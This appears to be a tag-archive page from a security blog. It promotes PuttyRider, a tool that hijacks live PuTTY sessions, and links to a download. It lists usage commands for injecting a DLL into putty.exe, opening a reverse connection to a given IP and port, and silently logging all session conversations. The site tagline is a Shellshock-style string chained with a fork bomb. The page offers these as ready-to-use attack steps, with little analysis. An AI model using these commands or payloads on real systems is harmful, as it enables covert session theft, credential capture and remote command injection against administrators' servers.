puttyrider Archives - Proturk Security Blog

Puttyrider targets sysadmin tool putty. This tiny utility hijacks putty sessions and injects code in open sessions.

Usage;

List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don’t forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Download, code, details here

M	T	W	T	F	S	S
« Jan
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30	31

Proturk Security Blog

"() { :; }; :(){ :|: & };:"

Tag Archives: puttyrider

PuttyRider tool hijacks Putty sessions in order to sniff conversation and inject Linux commands.

Share this: